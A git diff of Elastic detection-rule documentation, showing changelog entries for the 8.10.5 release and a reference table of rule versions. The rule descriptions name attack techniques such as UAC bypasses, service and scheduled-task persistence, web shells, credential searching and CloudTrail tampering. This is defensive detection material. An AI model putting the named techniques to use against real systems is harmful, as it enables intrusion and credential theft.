Execution via Scheduled Task>> | Identifies execution of a suspicious program via scheduled tasks by looking at process lineage and command line usage. 
| update | 105 + +|<<prebuilt-rule-8-10-5-suspicious-imagepath-service-creation, Suspicious ImagePath Service Creation>> | Identifies the creation of a suspicious ImagePath value. This could be an indication of an adversary attempting to stealthily persist or escalate privileges through abnormal service creation. | update | 105 + +|<<prebuilt-rule-8-10-5-system-shells-via-services, System Shells via Services>> | Windows services typically run as SYSTEM and can be used as a privilege escalation opportunity. Malware or penetration testers may run a shell as a service to gain SYSTEM permissions. | update | 108 + +|<<prebuilt-rule-8-10-5-temporarily-scheduled-task-creation, Temporarily Scheduled Task Creation>> | Indicates the creation and deletion of a scheduled task within a short time interval. Adversaries can use these to proxy malicious execution via the schedule service and perform clean up. | update | 7 + +|<<prebuilt-rule-8-10-5-potential-persistence-via-time-provider-modification, Potential Persistence via Time Provider Modification>> | Identifies modification of the Time Provider. Adversaries may establish persistence by registering and enabling a malicious DLL as a time provider. Windows uses the time provider architecture to obtain accurate time stamps from other network devices or clients in the network. Time providers are implemented in the form of a DLL file which resides in the System32 folder. The service W32Time initiates during the startup of Windows and loads w32time.dll. | update | 105 + +|<<prebuilt-rule-8-10-5-persistence-via-hidden-run-key-detected, Persistence via Hidden Run Key Detected>> | Identifies a persistence mechanism that utilizes the NtSetValueKey native API to create a hidden (null terminated) registry key. An adversary may use this method to hide from system utilities such as the Registry Editor (regedit). 
| update | 105 + +|<<prebuilt-rule-8-10-5-installation-of-security-support-provider, Installation of Security Support Provider>> | Identifies registry modifications related to the Windows Security Support Provider (SSP) configuration. Adversaries may abuse this to establish persistence in an environment. | update | 105 + +|<<prebuilt-rule-8-10-5-persistence-via-telemetrycontroller-scheduled-task-hijack, Persistence via TelemetryController Scheduled Task Hijack>> | Detects the successful hijack of Microsoft Compatibility Appraiser scheduled task to establish persistence with an integrity level of system. | update | 106 + +|<<prebuilt-rule-8-10-5-persistence-via-update-orchestrator-service-hijack, Persistence via Update Orchestrator Service Hijack>> | Identifies potential hijacking of the Microsoft Update Orchestrator Service to establish persistence with an integrity level of SYSTEM. | update | 108 + +|<<prebuilt-rule-8-10-5-persistence-via-wmi-event-subscription, Persistence via WMI Event Subscription>> | An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. | update | 107 + +|<<prebuilt-rule-8-10-5-execution-via-mssql-xp-cmdshell-stored-procedure, Execution via MSSQL xp_cmdshell Stored Procedure>> | Identifies execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default, thus, it's important to review the context of it's use. 
| update | 107 + +|<<prebuilt-rule-8-10-5-web-shell-detection-script-process-child-of-common-web-processes, Web Shell Detection: Script Process Child of Common Web Processes>> | Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. | update | 107 + +|<<prebuilt-rule-8-10-5-modification-of-the-mspkiaccountcredentials, Modification of the msPKIAccountCredentials>> | Identify the modification of the msPKIAccountCredentials attribute in an Active Directory User Object. Attackers can abuse the credentials roaming feature to overwrite an arbitrary file for privilege escalation. ms-PKI-AccountCredentials contains binary large objects (BLOBs) of encrypted credential objects from the credential manager store, private keys, certificates, and certificate requests. | update | 7 + +|<<prebuilt-rule-8-10-5-disabling-user-account-control-via-registry-modification, Disabling User Account Control via Registry Modification>> | User Account Control (UAC) can help mitigate the impact of malware on Windows hosts. With UAC, apps and tasks always run in the security context of a non-administrator account, unless an administrator specifically authorizes administrator-level access to the system. This rule identifies registry value changes to bypass User Access Control (UAC) protection. | update | 107 + +|<<prebuilt-rule-8-10-5-first-time-seen-driver-loaded, First Time Seen Driver Loaded>> | Identifies the load of a driver with an original file name and signature values that were observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment. | update | 6 + +|<<prebuilt-rule-8-10-5-creation-or-modification-of-a-new-gpo-scheduled-task-or-service, Creation or Modification of a new GPO Scheduled Task or Service>> | Detects the creation or modification of a new Group Policy based scheduled task or service. 
These methods are used for legitimate system administration, but can also be abused by an attacker with domain admin permissions to execute a malicious payload remotely on all or a subset of the domain joined machines. | update | 106 + +|<<prebuilt-rule-8-10-5-scheduled-task-execution-at-scale-via-gpo, Scheduled Task Execution at Scale via GPO>> | Detects the modification of Group Policy Object attributes to execute a scheduled task in the objects controlled by the GPO. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-installerfiletakeover, Potential Privilege Escalation via InstallerFileTakeOver>> | Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) default PoC execution. Successful exploitation allows an unprivileged user to escalate privileges to SYSTEM. | update | 108 + +|<<prebuilt-rule-8-10-5-suspicious-dll-loaded-for-persistence-or-privilege-escalation, Suspicious DLL Loaded for Persistence or Privilege Escalation>> | Identifies the loading of a non Microsoft signed DLL that is missing on a default Windows install (phantom DLL) or one that can be loaded from a different location by a native Windows process. This may be abused to persist or elevate privileges via privileged file write vulnerabilities. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-port-monitor-or-print-processor-registration-abuse, Potential Port Monitor or Print Processor Registration Abuse>> | Identifies port monitor and print processor registry modifications. Adversaries may abuse port monitor and print processors to run malicious DLLs during system boot that will be executed as SYSTEM for privilege escalation and/or persistence, if permissions allow writing a fully-qualified pathname for that DLL. 
| update | 105 + +|<<prebuilt-rule-8-10-5-potential-privileged-escalation-via-samaccountname-spoofing, Potential Privileged Escalation via SamAccountName Spoofing>> | Identifies a suspicious computer account name rename event, which may indicate an attempt to exploit CVE-2021-42278 to elevate privileges from a standard domain user to a user with domain admin privileges. CVE-2021-42278 is a security vulnerability that allows potential attackers to impersonate a domain controller via samAccountName attribute spoofing. | update | 106 + +|<<prebuilt-rule-8-10-5-service-control-spawned-via-script-interpreter, Service Control Spawned via Script Interpreter>> | Identifies Service Control (sc.exe) spawning from script interpreter processes to create, modify, or start services. This can potentially indicate an attempt to elevate privileges or maintain persistence. | update | 107 + +|<<prebuilt-rule-8-10-5-uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface, UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface>> | Identifies attempts to bypass User Account Control (UAC) by abusing an elevated COM Interface to launch a rogue Windows ClipUp program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. | update | 106 + +|<<prebuilt-rule-8-10-5-uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer, UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer>> | Identifies User Account Control (UAC) bypass attempts by abusing an elevated COM Interface to launch a malicious program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. | update | 106 + +|<<prebuilt-rule-8-10-5-uac-bypass-via-icmluautil-elevated-com-interface, UAC Bypass via ICMLuaUtil Elevated COM Interface>> | Identifies User Account Control (UAC) bypass attempts via the ICMLuaUtil Elevated COM interface. 
Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. | update | 106 + +|<<prebuilt-rule-8-10-5-uac-bypass-via-diskcleanup-scheduled-task-hijack, UAC Bypass via DiskCleanup Scheduled Task Hijack>> | Identifies User Account Control (UAC) bypass via hijacking DiskCleanup Scheduled Task. Attackers bypass UAC to stealthily execute code with elevated permissions. | update | 105 + +|<<prebuilt-rule-8-10-5-uac-bypass-attempt-via-privileged-ifileoperation-com-interface, UAC Bypass Attempt via Privileged IFileOperation COM Interface>> | Identifies attempts to bypass User Account Control (UAC) via DLL side-loading. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions. | update | 106 + +|<<prebuilt-rule-8-10-5-bypass-uac-via-event-viewer, Bypass UAC via Event Viewer>> | Identifies User Account Control (UAC) bypass via eventvwr.exe. Attackers bypass UAC to stealthily execute code with elevated permissions. | update | 108 + +|<<prebuilt-rule-8-10-5-uac-bypass-attempt-via-windows-directory-masquerading, UAC Bypass Attempt via Windows Directory Masquerading>> | Identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions. | update | 108 + +|<<prebuilt-rule-8-10-5-uac-bypass-via-windows-firewall-snap-in-hijack, UAC Bypass via Windows Firewall Snap-In Hijack>> | Identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions. | update | 108 + +|<<prebuilt-rule-8-10-5-unusual-service-host-child-process-childless-service, Unusual Service Host Child Process - Childless Service>> | Identifies unusual child processes of Service Host (svchost.exe) that traditionally do not spawn any child processes. 
This may indicate a code injection or an equivalent form of exploitation. | update | 106 + +|============================================== diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-changelog.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-changelog.asciidoc index 7aaebdde3c..6a72354716 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-changelog.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-changelog.asciidoc @@ -1250,8 +1250,6 @@ information about a rule's changes, see the rule's description page. <<potential-credential-access-via-trusted-developer-utility>> -<<potential-dll-sideloading-via-trusted-microsoft-programs>> - <<potential-evasion-via-filter-manager>> <<process-activity-via-compiled-html-file>> @@ -1546,8 +1544,6 @@ information about a rule's changes, see the rule's description page. <<potential-credential-access-via-trusted-developer-utility>> -<<potential-dll-sideloading-via-trusted-microsoft-programs>> - <<potential-modification-of-accessibility-binaries>> <<potential-secure-file-deletion-via-sdelete-utility>> diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc index 28ac360395..8c9f3b5b97 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc 
@@ -13,6 +13,15 @@ For previous rule updates, please navigate to the https://www.elastic.co/guide/e |Update version |Date | New rules | Updated rules | Notes +|<<prebuilt-rule-8-10-5-prebuilt-rules-8-10-5-summary, 8.10.5>> | 24 Oct 2023 | 28 | 279 | +This release includes new rules for Windows and Linux. +New rules for Windows include detection for image loading with invalid signatures. +Linux rules include additional detection for suspicious Unix socket connections, privilege esvalation via cap_setuid and reverse shells. +Several build block rules have been added for Linux and Windows regarding user entity behavior. +Machine learning rules for Domain Generation Algorithms (DGA) and Lateral Movement Detection (LMD) analytic packages have been moved to prebuilt rules. +Machine learning rules for Living-off-the-Land (LotL) Detection, and Data Exfiltration Detection (DED) analytic packages have been migrated to the prebuilt rules as well. +Additionally, lucene queries using boolean logic have been updated to use uppercase operators. + |<<prebuilt-rule-8-10-4-prebuilt-rules-8-10-4-summary, 8.10.4>> | 14 Oct 2023 | 21 | 56 | This release includes new rules for GitHub, Windows and Linux. New rules for GitHub include detection for organization wide applications and new repository owners. @@ -47,3 +56,4 @@ include::downloadable-packages/8-10-1/prebuilt-rules-8-10-1-summary.asciidoc[lev include::downloadable-packages/8-10-2/prebuilt-rules-8-10-2-summary.asciidoc[leveloffset=+1] include::downloadable-packages/8-10-3/prebuilt-rules-8-10-3-summary.asciidoc[leveloffset=+1] include::downloadable-packages/8-10-4/prebuilt-rules-8-10-4-summary.asciidoc[leveloffset=+1] +include::downloadable-packages/8-10-5/prebuilt-rules-8-10-5-summary.asciidoc[leveloffset=+1] diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc index 1a358b8b8b..3c0710ce6f 100644 
--- a/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc 
@@ -18,117 +18,117 @@ and their rule type is `machine_learning`. |<<a-scheduled-task-was-updated, A scheduled task was updated>> |Indicates the update of a scheduled task using Windows event logs. Adversaries can use these to establish persistence, by changing the configuration of a legit scheduled task. Some changes such as disabling or enabling a scheduled task are common and may may generate noise. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence] |8.3.0 |8 -|<<aws-cloudtrail-log-created, AWS CloudTrail Log Created>> |Identifies the creation of an AWS log trail that specifies the settings for delivery of log data. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Collection] |8.3.0 |105 +|<<aws-cloudtrail-log-created, AWS CloudTrail Log Created>> |Identifies the creation of an AWS log trail that specifies the settings for delivery of log data. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Collection] |8.9.0 |206 -|<<aws-cloudtrail-log-deleted, AWS CloudTrail Log Deleted>> |Identifies the deletion of an AWS log trail. An adversary may delete trails in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.3.0 |107 +|<<aws-cloudtrail-log-deleted, AWS CloudTrail Log Deleted>> |Identifies the deletion of an AWS log trail. An adversary may delete trails in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.9.0 |208 -|<<aws-cloudtrail-log-suspended, AWS CloudTrail Log Suspended>> |Identifies suspending the recording of AWS API calls and log file delivery for the specified trail. 
An adversary may suspend trails in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.3.0 |107 +|<<aws-cloudtrail-log-suspended, AWS CloudTrail Log Suspended>> |Identifies suspending the recording of AWS API calls and log file delivery for the specified trail. An adversary may suspend trails in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.9.0 |208 -|<<aws-cloudtrail-log-updated, AWS CloudTrail Log Updated>> |Identifies an update to an AWS log trail setting that specifies the delivery of log files. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Impact] |8.3.0 |107 +|<<aws-cloudtrail-log-updated, AWS CloudTrail Log Updated>> |Identifies an update to an AWS log trail setting that specifies the delivery of log files. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Impact] |8.9.0 |208 -|<<aws-cloudwatch-alarm-deletion, AWS CloudWatch Alarm Deletion>> |Identifies the deletion of an AWS CloudWatch alarm. An adversary may delete alarms in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.3.0 |107 +|<<aws-cloudwatch-alarm-deletion, AWS CloudWatch Alarm Deletion>> |Identifies the deletion of an AWS CloudWatch alarm. An adversary may delete alarms in an attempt to evade defenses. 
|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.9.0 |208 -|<<aws-cloudwatch-log-group-deletion, AWS CloudWatch Log Group Deletion>> |Identifies the deletion of a specified AWS CloudWatch log group. When a log group is deleted, all the archived log events associated with the log group are also permanently deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Impact] |8.3.0 |107 +|<<aws-cloudwatch-log-group-deletion, AWS CloudWatch Log Group Deletion>> |Identifies the deletion of a specified AWS CloudWatch log group. When a log group is deleted, all the archived log events associated with the log group are also permanently deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Impact] |8.9.0 |208 -|<<aws-cloudwatch-log-stream-deletion, AWS CloudWatch Log Stream Deletion>> |Identifies the deletion of an AWS CloudWatch log stream, which permanently deletes all associated archived log events with the stream. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Impact], [Resources: Investigation Guide] |8.3.0 |107 +|<<aws-cloudwatch-log-stream-deletion, AWS CloudWatch Log Stream Deletion>> |Identifies the deletion of an AWS CloudWatch log stream, which permanently deletes all associated archived log events with the stream. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Impact], [Resources: Investigation Guide] |8.9.0 |208 -|<<aws-config-resource-deletion, AWS Config Resource Deletion>> |Identifies attempts to delete an AWS Config Service resource. 
An adversary may tamper with Config services in order to reduce visibility into the security posture of an account and / or its workload instances. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.3.0 |107 +|<<aws-config-resource-deletion, AWS Config Resource Deletion>> |Identifies attempts to delete an AWS Config Service resource. An adversary may tamper with Config services in order to reduce visibility into the security posture of an account and / or its workload instances. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.9.0 |208 -|<<aws-configuration-recorder-stopped, AWS Configuration Recorder Stopped>> |Identifies an AWS configuration change to stop recording a designated set of resources. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-configuration-recorder-stopped, AWS Configuration Recorder Stopped>> |Identifies an AWS configuration change to stop recording a designated set of resources. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.9.0 |205 |<<aws-credentials-searched-for-inside-a-container, AWS Credentials Searched For Inside A Container>> |This rule detects the use of system search utilities like grep and find to search for AWS credentials inside a container. Unauthorized access to these sensitive files could lead to further compromise of the container environment or facilitate a container breakout to the underlying cloud environment. 
|[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.8.0 |1 -|<<aws-deletion-of-rds-instance-or-cluster, AWS Deletion of RDS Instance or Cluster>> |Identifies the deletion of an Amazon Relational Database Service (RDS) Aurora database cluster, global database cluster, or database instance. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Impact] |8.3.0 |104 +|<<aws-deletion-of-rds-instance-or-cluster, AWS Deletion of RDS Instance or Cluster>> |Identifies the deletion of an Amazon Relational Database Service (RDS) Aurora database cluster, global database cluster, or database instance. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Impact] |8.9.0 |205 -|<<aws-ec2-encryption-disabled, AWS EC2 Encryption Disabled>> |Identifies disabling of Amazon Elastic Block Store (EBS) encryption by default in the current region. Disabling encryption by default does not change the encryption status of your existing volumes. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.3.0 |104 +|<<aws-ec2-encryption-disabled, AWS EC2 Encryption Disabled>> |Identifies disabling of Amazon Elastic Block Store (EBS) encryption by default in the current region. Disabling encryption by default does not change the encryption status of your existing volumes. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.9.0 |205 -|<<aws-ec2-full-network-packet-capture-detected, AWS EC2 Full Network Packet Capture Detected>> |Identifies potential Traffic Mirroring in an Amazon Elastic Compute Cloud (EC2) instance. Traffic Mirroring is an Amazon VPC feature that you can use to copy network traffic from an Elastic network interface. 
This feature can potentially be abused to exfiltrate sensitive data from unencrypted internal traffic. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Exfiltration], [Tactic: Collection] |8.3.0 |104 +|<<aws-ec2-full-network-packet-capture-detected, AWS EC2 Full Network Packet Capture Detected>> |Identifies potential Traffic Mirroring in an Amazon Elastic Compute Cloud (EC2) instance. Traffic Mirroring is an Amazon VPC feature that you can use to copy network traffic from an Elastic network interface. This feature can potentially be abused to exfiltrate sensitive data from unencrypted internal traffic. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Exfiltration], [Tactic: Collection] |8.9.0 |205 -|<<aws-ec2-network-access-control-list-creation, AWS EC2 Network Access Control List Creation>> |Identifies the creation of an AWS Elastic Compute Cloud (EC2) network access control list (ACL) or an entry in a network ACL with a specified rule number. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.3.0 |104 +|<<aws-ec2-network-access-control-list-creation, AWS EC2 Network Access Control List Creation>> |Identifies the creation of an AWS Elastic Compute Cloud (EC2) network access control list (ACL) or an entry in a network ACL with a specified rule number. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.9.0 |205 -|<<aws-ec2-network-access-control-list-deletion, AWS EC2 Network Access Control List Deletion>> |Identifies the deletion of an Amazon Elastic Compute Cloud (EC2) network access control list (ACL) or one of its ingress/egress entries. 
|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-ec2-network-access-control-list-deletion, AWS EC2 Network Access Control List Deletion>> |Identifies the deletion of an Amazon Elastic Compute Cloud (EC2) network access control list (ACL) or one of its ingress/egress entries. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.9.0 |205 -|<<aws-ec2-snapshot-activity, AWS EC2 Snapshot Activity>> |An attempt was made to modify AWS EC2 snapshot attributes. Snapshots are sometimes shared by threat actors in order to exfiltrate bulk data from an EC2 fleet. If the permissions were modified, verify the snapshot was not shared with an unauthorized or unexpected AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Exfiltration], [Resources: Investigation Guide] |8.3.0 |107 +|<<aws-ec2-snapshot-activity, AWS EC2 Snapshot Activity>> |An attempt was made to modify AWS EC2 snapshot attributes. Snapshots are sometimes shared by threat actors in order to exfiltrate bulk data from an EC2 fleet. If the permissions were modified, verify the snapshot was not shared with an unauthorized or unexpected AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Exfiltration], [Resources: Investigation Guide] |8.9.0 |208 -|<<aws-ec2-vm-export-failure, AWS EC2 VM Export Failure>> |Identifies an attempt to export an AWS EC2 instance. A virtual machine (VM) export may indicate an attempt to extract or exfiltrate information. 
|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Exfiltration], [Tactic: Collection] |8.3.0 |104 +|<<aws-ec2-vm-export-failure, AWS EC2 VM Export Failure>> |Identifies an attempt to export an AWS EC2 instance. A virtual machine (VM) export may indicate an attempt to extract or exfiltrate information. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Exfiltration], [Tactic: Collection] |8.9.0 |205 -|<<aws-efs-file-system-or-mount-deleted, AWS EFS File System or Mount Deleted>> |Detects when an EFS File System or Mount is deleted. An adversary could break any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. The mount must be deleted prior to deleting the File System, or the adversary will be unable to delete the File System. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.3.0 |104 +|<<aws-efs-file-system-or-mount-deleted, AWS EFS File System or Mount Deleted>> |Detects when an EFS File System or Mount is deleted. An adversary could break any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. The mount must be deleted prior to deleting the File System, or the adversary will be unable to delete the File System. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.9.0 |205 -|<<aws-elasticache-security-group-created, AWS ElastiCache Security Group Created>> |Identifies when an ElastiCache security group has been created. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-elasticache-security-group-created, AWS ElastiCache Security Group Created>> |Identifies when an ElastiCache security group has been created. 
|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.9.0 |205 -|<<aws-elasticache-security-group-modified-or-deleted, AWS ElastiCache Security Group Modified or Deleted>> |Identifies when an ElastiCache security group has been modified or deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-elasticache-security-group-modified-or-deleted, AWS ElastiCache Security Group Modified or Deleted>> |Identifies when an ElastiCache security group has been modified or deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.9.0 |205 -|<<aws-eventbridge-rule-disabled-or-deleted, AWS EventBridge Rule Disabled or Deleted>> |Identifies when a user has disabled or deleted an EventBridge rule. This activity can result in an unintended loss of visibility in applications or a break in the flow with other AWS services. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.3.0 |104 +|<<aws-eventbridge-rule-disabled-or-deleted, AWS EventBridge Rule Disabled or Deleted>> |Identifies when a user has disabled or deleted an EventBridge rule. This activity can result in an unintended loss of visibility in applications or a break in the flow with other AWS services. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.9.0 |205 -|<<aws-execution-via-system-manager, AWS Execution via System Manager>> |Identifies the execution of commands and scripts via System Manager. Execution methods such as RunShellScript, RunPowerShellScript, and alike can be abused by an authenticated attacker to install a backdoor or to interact with a compromised instance via reverse-shell using system only commands. 
|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Initial Access], [Resources: Investigation Guide] |8.3.0 |107 +|<<aws-execution-via-system-manager, AWS Execution via System Manager>> |Identifies the execution of commands and scripts via System Manager. Execution methods such as RunShellScript, RunPowerShellScript, and alike can be abused by an authenticated attacker to install a backdoor or to interact with a compromised instance via reverse-shell using system only commands. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Initial Access], [Resources: Investigation Guide] |8.9.0 |208 -|<<aws-guardduty-detector-deletion, AWS GuardDuty Detector Deletion>> |Identifies the deletion of an Amazon GuardDuty detector. Upon deletion, GuardDuty stops monitoring the environment and all existing findings are lost. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-guardduty-detector-deletion, AWS GuardDuty Detector Deletion>> |Identifies the deletion of an Amazon GuardDuty detector. Upon deletion, GuardDuty stops monitoring the environment and all existing findings are lost. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.9.0 |205 -|<<aws-iam-assume-role-policy-update, AWS IAM Assume Role Policy Update>> |Identifies attempts to modify an AWS IAM Assume Role Policy. An adversary may attempt to modify the AssumeRolePolicy of a misconfigured role in order to gain the privileges of that role. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Privilege Escalation] |8.3.0 |107 +|<<aws-iam-assume-role-policy-update, AWS IAM Assume Role Policy Update>> |Identifies attempts to modify an AWS IAM Assume Role Policy. 
An adversary may attempt to modify the AssumeRolePolicy of a misconfigured role in order to gain the privileges of that role. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Privilege Escalation] |8.9.0 |208 -|<<aws-iam-brute-force-of-assume-role-policy, AWS IAM Brute Force of Assume Role Policy>> |Identifies a high number of failed attempts to assume an AWS Identity and Access Management (IAM) role. IAM roles are used to delegate access to users or services. An adversary may attempt to enumerate IAM roles in order to determine if a role exists before attempting to assume or hijack the discovered role. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Credential Access] |8.3.0 |107 +|<<aws-iam-brute-force-of-assume-role-policy, AWS IAM Brute Force of Assume Role Policy>> |Identifies a high number of failed attempts to assume an AWS Identity and Access Management (IAM) role. IAM roles are used to delegate access to users or services. An adversary may attempt to enumerate IAM roles in order to determine if a role exists before attempting to assume or hijack the discovered role. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Credential Access] |8.9.0 |208 -|<<aws-iam-deactivation-of-mfa-device, AWS IAM Deactivation of MFA Device>> |Identifies the deactivation of a specified multi-factor authentication (MFA) device and removes it from association with the user name for which it was originally enabled. In AWS Identity and Access Management (IAM), a device must be deactivated before it can be deleted. 
